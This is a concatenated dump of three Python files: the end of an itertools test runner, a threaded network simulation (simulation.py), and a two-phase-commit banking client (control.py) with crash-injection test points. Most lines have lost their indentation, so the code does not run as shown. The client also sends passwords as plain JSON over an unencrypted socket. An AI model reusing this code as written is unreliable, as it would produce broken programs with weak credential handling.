... for i in range(-len(seq), 0):
... assert nth_combination(population, r, i) == seq[i]
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents,
SizeofTest)
support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print(counts)
# TODO: RUSTPYTHON this hangs or is very slow
# doctest the examples in the library reference
# support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 30))
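    # Note the mismatched MTUs (50 on the client->router link vs. 30 on the router->server
    # link); presumably this exercises fragmentation/drop behaviour in the Router and Link
    # classes, whose implementations live in network.py and link.py and are not shown here.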
#start all the objects
thread_L = []
    thread_L.append(threading.Thread(name=str(client), target=client.run))
    thread_L.append(threading.Thread(name=str(server), target=server.run))
    thread_L.append(threading.Thread(name=str(router_a), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(1):
client.udt_send(2, 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.')
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
control.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Moments at which the client may crash:
1. Before the business request is sent -- fine
2. After the request is sent, before the first-stage recv -- fine
3. After the first-stage recv, before the ack -- fine
4. After the first-stage ack, before the second-stage recv -- unrecoverable; data may become inconsistent (a known weakness of the two-phase commit protocol)
5. After the second-stage recv, before the ack -- not implemented; recoverable from the log (within the scope of the local transaction)
6. After the second-stage ack, before the result recv -- within the scope of the local transaction
7. After the result recv -- only a display issue
"""
# ------ TEST POINT ------
TEST_POINT_1 = False # before request
TEST_POINT_2 = False # before first recv
TEST_POINT_3 = False # before first send
TEST_POINT_4 = False # before second recv
TEST_POINT_5 = False # before second send
TEST_POINT_6 = False # before result recv
TEST_POINT_7 = False # after result recv
# --------- END ----------
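# Rough sketch (added for clarity; inferred from Control._operation / Control._transaction
# below, not from a protocol spec) of the exchange with the coordinator, showing where
# each TEST_POINT simulates a crash:
#
#   client -> coordinator : business request {'type': '20'/'30'/'40', 'token', 'bankcard', 'amount'}  (TEST_POINT_1 before send)
#   coordinator -> client : first stage      {'sequence', 'msg', ...}                                 (TEST_POINT_2 before recv)
#   client -> coordinator : first-stage ack  {'sequence', 'status': 0}                                (TEST_POINT_3 before send)
#   coordinator -> client : second stage     commit/rollback decision                                 (TEST_POINT_4 before recv)
#   client -> coordinator : second-stage ack                                                          (TEST_POINT_5 before send)
#   coordinator -> client : final result                                                              (TEST_POINT_6 before recv, TEST_POINT_7 after)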
import sys
import json
import time
import math
import signal
import socket
import logging
from threading import Thread
__TIMEOUT__ = 10
log_fmt = '[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s'
date_fmt = '%m-%d %H:%M:%S'
logging.basicConfig(filename='control.log',level=logging.DEBUG, format=log_fmt, datefmt=date_fmt)
class Control:
def __init__(self, **kw):
"""
kw -- dictionary, {'bankcard': bankcard, 'password': password, 'address': address, 'port': port}
"""
        signal.signal(signal.SIGCHLD, signal.SIG_IGN)  # ignore SIGCHLD so finished children do not become zombies
self.login_info = kw
self.address = (kw['address'], int(kw['port']))
def login(self):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
msg = {'type': '00',
'bankcard': self.login_info['bankcard'],
'password': self.login_info['password']
}
payload = json.dumps(msg).encode('utf-8')
result = dict()
try:
s.connect(self.address)
s.sendall(payload)
buf = s.recv(1024).decode('utf-8')
s.close()
logging.debug("login recv: {}".format(buf))
if buf == '': # means server closed
result['status'] = False
result['msg'] = 'server closed'
else:
reply = json.loads(buf)
if reply['status'] == 0:
self.login_info['token'] = reply['token']
self.login_info['deadline'] = int(reply['deadline'])
result['status'] = True
#self.t_renewal = Thread(target=self.renewal_token)
#self.t_renewal.start()
else:
result['status'] = False
result['msg'] = reply['msg']
        except Exception as e:  # catch all exceptions, see https://python3-cookbook.readthedocs.io/zh_CN/latest/c14/p07_catching_all_exceptions.html
            result['status'] = False
            result['msg'] = str(e)
finally:
logging.debug("login result: {}".format(str(result)))
return result
def renewal_token(self):
logging.debug("------ renewal thread start ------")
msg = {'type': '10', 'bankcard': self.login_info['bankcard'], 'token': self.login_info['token']}
payload = json.dumps(msg).encode('utf-8')
        while not getattr(self, '_renewal_stop', False):  # flag is set by stop()
time.sleep(60)
logging.debug("------ try to renewal ------")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
date = math.floor(time.time())
            remaining = self.login_info['deadline'] - date
            if 0 < remaining < 300:  # renew only when the token is close to expiring but not yet expired
try:
s.connect(self.address)
s.sendall(payload)
buf = s.recv(1024).decode('utf-8')
s.close()
if buf == '':
logging.info("renewal fail.")
else:
msg = json.loads(buf)
if msg['status'] == 0 and msg['token'] == self.login_info['token']:
self.login_info['deadline'] = int(msg['deadline'])
logging.info("renewal success.")
else:
logging.info("renewal fail. token has some question.")
except Exception as e:
logging.info("renewal fail. {}".format(e))
    def stop(self):
        """
        when the client exits, ask the renewal thread to stop
        (threading.Thread has no exit() method, so a stop flag is used instead)
        """
        self._renewal_stop = True
def deposit(self, amount):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
        if amount <= 0:
            return {'status': False, 'msg': 'invalid amount'}  # reject non-positive amounts instead of silently ignoring them
msg = { 'type': '20',
'token': self.login_info['token'],
'bankcard': self.login_info['bankcard'],
"amount": int(amount)
}
return self._operation(msg)
def withdraw(self, amount):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
        if amount <= 0:
            return {'status': False, 'msg': 'invalid amount'}  # reject non-positive amounts instead of silently ignoring them
msg = { 'type': '30',
'token': self.login_info['token'],
'bankcard': self.login_info['bankcard'],
"amount": int(amount)
}
return self._operation(msg)
def transfer(self, amount, transferred):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
        if amount <= 0:
            return {'status': False, 'msg': 'invalid amount'}  # reject non-positive amounts instead of silently ignoring them
msg = { "type": '40',
"token": self.login_info['token'],
"bankcard": self.login_info['bankcard'],
"transferred": str(transferred),
"amount": int(amount)
}
return self._operation(msg)
def _operation(self, msg):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
result = dict()
try:
payload = json.dumps(msg).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
s.connect(self.address)
# test point 1
if TEST_POINT_1 == True:
logging.info("TEST_POINT_1 == True, exit")
exit(0)
s.sendall(payload)
if TEST_POINT_2 == True:
logging.info("TEST_POINT_2 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
            if buf == '':  # connection was closed by the server
                result['status'] = False  # the transaction failed
                result['msg'] = 'socket closed'
else:
reply = json.loads(buf)
if reply.get('sequence') is None:
result['status'] = False
result['msg'] = reply['msg']
else:
self._transaction(s, reply) # ignore return
# test point 6
if TEST_POINT_6 == True:
logging.info("TEST_POINT_6 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
                    logging.debug("operation result: {}".format(buf))
# test point 7
if TEST_POINT_7 == True:
logging.info("TEST_POINT_7 == True, exit")
exit(0)
                    if buf == '':  # connection was closed by the server
                        result['msg'] = 'socket closed'
                        result['status'] = False
else:
result = json.loads(buf)
if result['status'] == 0:
result['status'] = True
else:
result['status'] = False
except Exception as e:
result['status'] = False
            result['msg'] = str(e)
finally:
return result
def _transaction(self, s, reply):
logging.info("------ Transaction Start ------")
result = dict()
try:
# first stage -- enquire or close socket or can't operation transaction
            logging.debug("first stage from coordinator: {}".format(str(reply)))
            sequence = reply['sequence']  # transaction sequence number
            # perform the local transaction operation, but do not release resources yet
            logging.info("redo, msg: {}".format(str(reply['msg'])))
            ack = {'sequence': sequence, 'status': 0}  # acknowledgement for the first stage
payload = json.dumps(ack).encode('utf-8')
if TEST_POINT_3 == True:
logging.info("TEST_POINT_3 == True, exit")
exit(0)
s.sendall(payload)
logging.info("{} first stage completes.".format(sequence))
# second stage -- commit or rollback
if TEST_POINT_4 == True:
logging.info("TEST_POINT_4 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
logging.debug("second stage from coordinator: {}".format(buf))
            if buf == "":  # connection was closed
                result['status'] = False  # the transaction failed
                result['msg'] = 'socket closed'
                # rollback
else:
reply = json.loads(buf)
if reply['sequence'] == sequence and reply['status'] == 0:
                    # committed successfully: release local resources
result['status'] = True
result['msg'] = 'transaction success'
else:
                    # roll back the local operation and release resources
result['status'] = False
result['msg'] = 'transaction fail'
if TEST_POINT_5 == True:
                logging.info("TEST_POINT_5 == True, exit")
exit(0)
s.sendall(payload)
logging.info("{} second stage completes.".format(sequence))
except Exception as e:
result['status'] = False
            result['msg'] = str(e)
finally:
logging.info("------ Transaction End ------")
logging.debug("transaction result: {}".format(str(result)))
return result
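# Minimal usage sketch (not part of the original module). The bankcard, password, address
# and port below are placeholders, and a coordinator/server from the rest of this project
# is assumed to be listening; each call simply returns the {'status': bool, 'msg': ...}
# dict documented in the methods above.
if __name__ == '__main__':
    ctrl = Control(bankcard='6222020000000000',  # placeholder card number
                   password='123456',            # placeholder password
                   address='127.0.0.1',          # assumed coordinator address
                   port=9000)                    # assumed coordinator port
    login_result = ctrl.login()
    print('login:', login_result)
    if login_result['status']:
        print('deposit:', ctrl.deposit(100))
        print('withdraw:', ctrl.withdraw(50))
        print('transfer:', ctrl.transfer(10, '6222020000000001'))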
|